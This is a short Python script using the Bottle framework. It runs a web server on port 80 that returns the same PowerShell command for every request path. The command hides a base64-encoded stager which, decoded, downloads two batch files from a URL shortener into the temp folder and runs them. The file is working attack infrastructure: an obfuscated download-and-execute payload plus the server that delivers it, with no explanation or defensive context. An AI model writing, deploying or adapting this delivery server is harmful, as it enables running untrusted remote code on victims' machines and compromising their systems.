# -*- coding:utf-8 -*-

from bottle import *


ps="""
Invoke-Expression ([System.Text.UnicodeEncoding]::Unicode.GetString([Convert]::FromBase64String("DQAKACQAZAAgAD0AIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAcgBlAG0AbwB2AGUAXwByAGEAbgBkAG8AbQBfADQAMwA3AC4AYgBhAHQAIgA7ACQAYwAxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAxAC4ARABvAHcAbgBs
AG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwBkAHcAegAuAGMAbgAvAEcAdgByADUAVwAwAE0AcAAiACwAJABkACkAOwAkAGQAZQBzACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXAByAGUAbQBvAHYAZQBfAHIAYQBuAGQAbwBtAC4AYgBhAHQAIgA7ACQAYwA9AE4AZQB3AC0ATwBiAGoA
ZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcABzADoALwAvAGQAdwB6AC4AYwBuAC8AZQA0AGUAMgBOAGMAcwBuACIALAAkAGQAZQBzACkAOwBpAG4AdgBvAGsAZQAtAGUAeABwAHIAZQBz
AHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAkAGQAZQBzADsAaQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAJABkADsA")));
"""

@route('/<n:path>',method=["POST","GET"])
def powershell(n):
   
    return ps;

@route('/')
def powershell1():

    return ps;


if __name__ == '__main__':
    run(host='0.0.0.0',port=80)
